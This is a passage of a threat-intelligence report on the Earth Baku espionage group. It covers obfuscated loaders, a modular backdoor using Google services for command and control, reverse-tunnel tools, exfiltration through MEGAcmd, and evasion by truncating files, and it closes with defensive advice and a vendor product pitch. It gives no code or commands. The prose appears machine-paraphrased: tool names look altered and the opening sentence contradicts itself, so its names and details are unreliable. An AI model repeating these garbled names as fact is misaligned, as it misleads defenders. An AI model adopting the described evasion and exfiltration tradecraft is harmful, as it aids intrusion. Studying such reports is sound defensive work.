Named as DodgeBox, StealthReacher serves as an upgraded version of StealthVector, utilizing code obfuscation methods such as FNV1-a and other techniques to evade defense mechanisms. Contrasted with the older StealthVector, it opts for AES algorithms for encryption and MD5 hashing for checksum. According to our investigation, StealthReacher acts as the designated loader to initiate the latest segmented backdoor, SneakCross.
It is noteworthy that both StealthVector and StealthReacher undergo re-encryption after the initial startup using XOR encryption, with the victim’s computer name as the key. From the standpoint of digital forensics, decryption and analysis of the amassed payload pose significant challenges despite acquiring all modules (loader and payload) concurrently.
SneakCross, a recent segmented backdoor, relies on Google services for its command-and-control (C&C) communication. It utilizes Windows Fibers to elude detection from network protection tools and EDR solutions. This backdoor is believed to succeed their earlier segmented backdoor, ScrambleCross, as detailed in our preceding analysis. The modular structure enables threat actors to conveniently upgrade its functionalities, alter behaviors, and tailor operations for diverse scenarios.
In Google Cloud’s disclosure, they acknowledged the identification of a minimum of 15 plugins supporting various backdoor operations, including:
- Shell Actions
- File System Actions
- Process Actions
- Network Scanning
- Network Store Interface Actions
- Screen Actions
- System Information Discovery
- File Manipulation Actions
- Keylogger
- Active Directory Actions
- File Uploader
- RDP
- DNS Actions
- DNS Cache Actions
- Registry Actions
Post-Infiltration Procedure
Within the post-infiltration phase, Earth Baku employs an array of utilities within the victim’s ecosystem for sustaining presence, elevation of privileges, exploration, and data extraction. This section will delve into the most noteworthy of these instruments.
Persistence: reverse-tunnel
Significant attempts by the malevolent actors involve constructing reverse tunnels with the following tools to maintain continuous control access over compromised systems:
Custom iox tool
The actors developed a personalized iox tunneling tool using publicly available source code. Modifications include simplified mandatory arguments (local IP/Port) and an additional unique argument -ggg. To initiate the tool, the user is required to input this distinctive argument, after which the tool operates correctly.
Rakshasa
Rakshasa represents a robust proxy tool crafted in Go, intended specifically for multi-tier proxying and internal network penetration.
Tailscale
Tailscale functions as a Virtual Private Network (VPN) service tailored to establish secure connectivity among devices within a unified virtual network. Recent observations depict threat actors striving to integrate compromised systems into their virtual networks using Tailscale. Moreover, these malevolent elements leverage legitimate Tailscale servers as intermediaries, markedly complicating efforts to trace the origin of their actions.
Data Extraction
Within the victim’s environment, numerous instances of MEGAcmd tools were found on the infected machines. This command-line tool interacts with the MEGA cloud storage service. We infer that the threat actors aimed to utilize this tool for transferring purloined data to MEGA, exploiting its efficiency in uploading substantial data volumes. A similar tactic was observed with an affiliated faction, Earth Lusca
Trace Elimination
Through our examination, we determined that Earth Baku deliberately tampered with their StealthVector loader by erasing the initial 1000 bytes of the file. This maneuver enables the threat actor to bypass security products (as evident in the lower detections in VirusTotal during authoring compared to the original version, which was identified by numerous security vendors). Such a strategy aims to increase the complexity of investigating the tools manipulated in ransomware assaults, a tactic uncommon in APT attacks. This illustrates that Earth Baku exhibits adeptness and precision in their malicious pursuits.
Summary
Since late 2022, Earth Baku has significantly broadened its operations from the Indo-Pacific region to encompass Europe and MEA. Recent operations showcase sophisticated tactics, utilizing public-facing applications like IIS servers for initial entry and deploying the Godzilla webshell for control. The group integrates new loaders such as StealthVector and StealthReacher to discreetly initiate backdoor elements, with SneakCross introduced as their latest segmented backdoor. Additionally, Earth Baku leverages various tools during post-infiltration operations, like a customized iox tool, Rakshasa, TailScale for persistence, and MEGAcmd for streamlined data extraction. These advancements underline Earth Baku’s progressing and increasingly advanced threat profile, presenting formidable challenges to cybersecurity defenses.
To safeguard against cyberespionage strategies and mitigate the risk of compromise, both individual users and organizations should adopt the following recommended practices:
- Enforcing the concept of minimal privilege: Limiting access to sensitive data and closely monitoring user permissions heighten the complexity for attackers aiming to traverse a corporate network.
- Rectifying security loopholes: Periodic updates of systems and applications, alongside stringent adherence to patch management policies, enable organizations to rectify security vulnerabilities within their ecosystem. Furthermore, deploying virtual patching can safeguard legacy systems lacking available patches.
- Crafting a proactive incident response plan: Implementing defensive measures oriented towards identifying and countering threats following a breach, coupled with regular security exercises, enhances the efficacy of an organization’s incident response blueprint.
- Embracing the 3-2-1 backup protocol: Maintaining a minimum of three data copies in two diverse formats, with one stored off-site in an air-gapped manner, ensures data integrity even in the event of a successful breach. Routine updates and testing of these backups bolster data security.
Organizations seeking to fortify their defenses against sophisticated attacks can explore robust security technologies like Trend Vision One™. This solution empowers security teams to consistently identify attack surfaces, encompassing known and unknown, managed and unmanaged cyber assets.
It supports organizations in evaluating and addressing potential risks and vulnerabilities by assessing critical factors such as attack likelihood and impact, delivering a comprehensive suite of prevention, detection, and response capabilities, all fortified by advanced threat research, intelligence, and AI. Vision One enhances an organization’s overall security posture and efficacy, providing robust defense against diverse types of attacks.
The indicators of compromise for this investigation can be accessed here.
About Author
